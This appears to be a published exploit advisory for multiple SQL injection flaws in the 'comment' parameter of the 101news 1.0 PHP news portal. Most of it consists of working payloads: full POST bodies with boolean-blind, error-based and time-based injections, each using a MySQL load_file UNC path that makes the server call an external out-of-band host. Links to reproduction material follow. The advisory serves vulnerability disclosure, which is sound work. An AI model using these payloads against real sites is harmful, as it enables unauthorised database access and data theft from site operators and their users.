Headline
101news By Mayuri K 1.0 SQL Injection
101news By Mayuri K version 1.0 suffers from multiple remote SQL injection vulnerabilities.
## Title: 101news-by-Mayuri-K-1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 02.02.2023## Vendor: https://mayurik.com/## Software: https://mayurik.com/source-code/P4030/news-portal-project-in-php## Reference: https://portswigger.net/web-security/sql-injection## Description:The `comment` parameter appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\1km7b3i42qkp4m2iy5ryphiobfh85zynpqdi0bo0.oastify.com\\bxf'))+'was submitted in the comment parameter.This payload injects a SQL sub-query that calls MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain.The application interacted with that domain, indicating that theinjected SQL query was executed. This system is absolutelyUNPROTECTED!STATUS: HIGH Vulnerability[+]Payload:```mysql---Parameter: comment (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause Payload: csrftoken=6606c0284475034686192a71b81d3e9360096c1bc0fa486d4a8636d582e2b0c5&name=IRSaszTW&[email protected]&comment=167565'+(selectload_file('\\\\1km7b3i42qkp4m2iy5ryphiobfh85zynpqdi0bo0.oastify.com\\bxf'))+''RLIKE (SELECT (CASE WHEN (1140=1140) THEN 0x313637353635+(selectload_file(0x5c5c5c5c316b6d376233693432716b70346d3269793572797068696f62666838357a796e7071646930626f302e6f6173746966792e636f6d5c5c627866))+''ELSE 0x28 END)) AND 'RBgF'='RBgF&submit= Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR) Payload: csrftoken=6606c0284475034686192a71b81d3e9360096c1bc0fa486d4a8636d582e2b0c5&name=IRSaszTW&[email protected]&comment=167565'+(selectload_file('\\\\1km7b3i42qkp4m2iy5ryphiobfh85zynpqdi0bo0.oastify.com\\bxf'))+''AND (SELECT 4135 FROM(SELECT COUNT(*),CONCAT(0x71766b6a71,(SELECT(ELT(4135=4135,1))),0x7171627071,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'iMBs'='iMBs&submit= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: csrftoken=6606c0284475034686192a71b81d3e9360096c1bc0fa486d4a8636d582e2b0c5&name=IRSaszTW&[email protected]&comment=167565'+(selectload_file('\\\\1km7b3i42qkp4m2iy5ryphiobfh85zynpqdi0bo0.oastify.com\\bxf'))+''AND (SELECT 1879 FROM (SELECT(SLEEP(3)))AQLB) AND 'asLq'='asLq&submit=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/101news)## Proof and Exploit:[href](https://streamable.com/vrc7x8)## Time spend:01:00:00